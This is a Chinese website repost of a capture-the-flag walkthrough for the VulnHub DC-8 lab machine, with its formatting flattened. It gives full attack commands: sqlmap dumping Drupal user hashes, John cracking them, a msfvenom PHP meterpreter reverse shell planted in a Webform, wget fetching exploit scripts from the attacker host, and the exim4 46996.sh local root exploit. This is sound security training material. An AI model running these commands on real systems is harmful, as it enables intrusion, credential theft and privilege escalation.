新闻详情

新闻详情

首页 / 资讯中心 / 详情

VulnHub 系列:DC,8

发布时间:2026/9/5 10:13:29来源:尧图网络
VulnHub 系列:DC,8
一、信息收集靶机IP192.168.152.148nmap -sP 192.168.152.0/24端口和服务nmap -sS -sV -T4 -A -p- 192.168.152.148Drupal 7droopescan scan drupal -u http://192.168.152.148 -e apython3.11 drupwn --mode enum --target http://192.168.152.148 --users --nodes --modules --dfiles --themes默认管理员用户admin 的UID 为1二、SQLi 获取后台登录口令网站首页http://192.168.152.148看到id 就想到SQL 注入(SQLi)看到留言就想到XSS祭出神器SQLMapsqlmap -u http://192.168.152.148/?nid1 --dbs sqlmap -u http://192.168.152.148/?nid1 -D d7db --tables sqlmap -u http://192.168.152.148/?nid1 -D d7db -T users --columns sqlmap -u http://192.168.152.148/?nid1 -D d7db -T users -C name,pass --dump用hash-identifier 没有识别出加密算法直接用John the Ripper 破解vim passwd.txt cat passwd.txt john - -wordlist/usr/share/wordlists/rockyou.txt /root/passwd.txt三、Drupal Webform 反弹shell使用john/turtle 登录后台http://192.168.152.148/user/login准备反弹shell如果看过之前写的DC7 靶机-Walkthrough可能会想到通过Add content--Basic page 去添加一个webshell但是在这个靶机里面我们是通过Add content--Webform 去添加webshell 的。Title 填好之后直接回车点击右上角的WEBFROM 按钮先在下方添加一个留言框设置好留言框的名字就是在Label 下面填入留言框的类型就设置成Textfield点击右侧的Add然后点击Form settings填入shell 代码。用msfvenom 生成webshell记得去除/*。msfvenom -p php/meterpreter/reverse_tcp LHOST192.168.152.141 LPORT1234 R shell.php设置Text format 为PHP code页面拉到最下面点击Save configuration之后会在顶部提示设置已经更新完毕。这个时候不要关闭这个配置页面而是点击右上角的VIEW 按钮。注意上面除了shell 代码之外必须加一些其他的东西不然无法反弹shell。然后在下图输入框中随便输入点什么。然后点击下方的按钮webshell这个名字是自己定义的这里是webshell之后会跳转到最终的提交页面。在点击下方的Submit 按钮之前需要先在kali 上监听端口这里使用的metasploit因为shell 代码是msfvenom 生成的。msfconsole use exploit/multi/handler set payload php/meterpreter/reverse_tcp set lhost 192.168.152.141 set lport 1234 runshell python3 -c import pty; pty.spawn(/bin/bash)四、exim4 提权直接用脚本搜集一下对于提权有用的信息老样子还是用linuxprivchecker.py。如果想熟悉一下没有脚本的情况下怎么收集这些信息可以参考privilegeescalation-_linux。先在kali开启httppython -m http.server 1215cd /tmp wget http://192.168.152.141:1215/linuxprivchecker.py为了便于查看收集到的信息我将结果输出到report.txt 文本中随后用less 命令进行查看python linuxprivchecker.py report.txt less report.txt在SUID 可执行文件中发现了之前没见过的一个程序exim4dpkg -l | grep exim4searchsploit exim 4查找46996.sh在kali所在的目录searchsploit exim 46996 searchsploit -p 46996 cd /usr/share/exploitdb/exploits/linux/local python -m http.server 1216wget http://192.168.152.141:1216/46996.sh chmod 777 46996.sh第一次执行报错又是因为不同系统之间编码格式的问题造成的./46996.sh -m setid id后来使用了第二种方法成功提权./46996.sh -m netcat id cd /root ls cat flag.txt
网站建设高端定制企业官网
RELATED

相关资讯

更多精彩内容,欢迎继续阅读

较早相关资讯

最新相关资讯

开源智能问数工具SQLBot实测:自然语言转SQL能走多远 2026/9/5 10:55:40

开源智能问数工具SQLBot实测:自然语言转SQL能走多远

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

阅读更多 →
基于51单片机的Boost升压电路设计:从原理到实践 2026/9/5 10:55:40

基于51单片机的Boost升压电路设计:从原理到实践

简介:本资源是一套完整的基于51单片机的Boost升压斩波电路设计与仿真学习包,面向嵌入式初学者、电子类课程设计学生及单片机实践爱好者,解决直流升压控制原理理解、软硬件协同调试与Proteus仿真验证等核心问题。压缩包共45个文件,…

阅读更多 →
软件公司技术困局破解:从技术债务到工程卓越的实践路径 2026/9/5 10:55:40

软件公司技术困局破解:从技术债务到工程卓越的实践路径

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

阅读更多 →
鸿蒙原生计时器开发复盘:从两次失败到精准计时架构 2026/9/5 10:55:40

鸿蒙原生计时器开发复盘:从两次失败到精准计时架构

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

阅读更多 →
PHP原生WebSocket实时通信骨架设计与实战 2026/9/5 10:55:40

PHP原生WebSocket实时通信骨架设计与实战

简介:这是一套面向Web开发者与PHP初学者的全开源H5实时聊天室解决方案,聚焦于即时通讯功能实现,适用于在线客服、社区互动、教学答疑等轻量级场景。资源采用PHP后端WebSocket协议构建,兼顾实时性与部署灵活性,支持数据…

阅读更多 →
Unity 6.7 a2 CoreCLR 运行时性能实测与配置指南 2026/9/5 10:52:39

Unity 6.7 a2 CoreCLR 运行时性能实测与配置指南

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

阅读更多 →

今日资讯

本周资讯

本月资讯

看完文章仍有疑问?

联系尧图顾问,获取一对一建站咨询

立即免费咨询 📞 400-888-8888
📞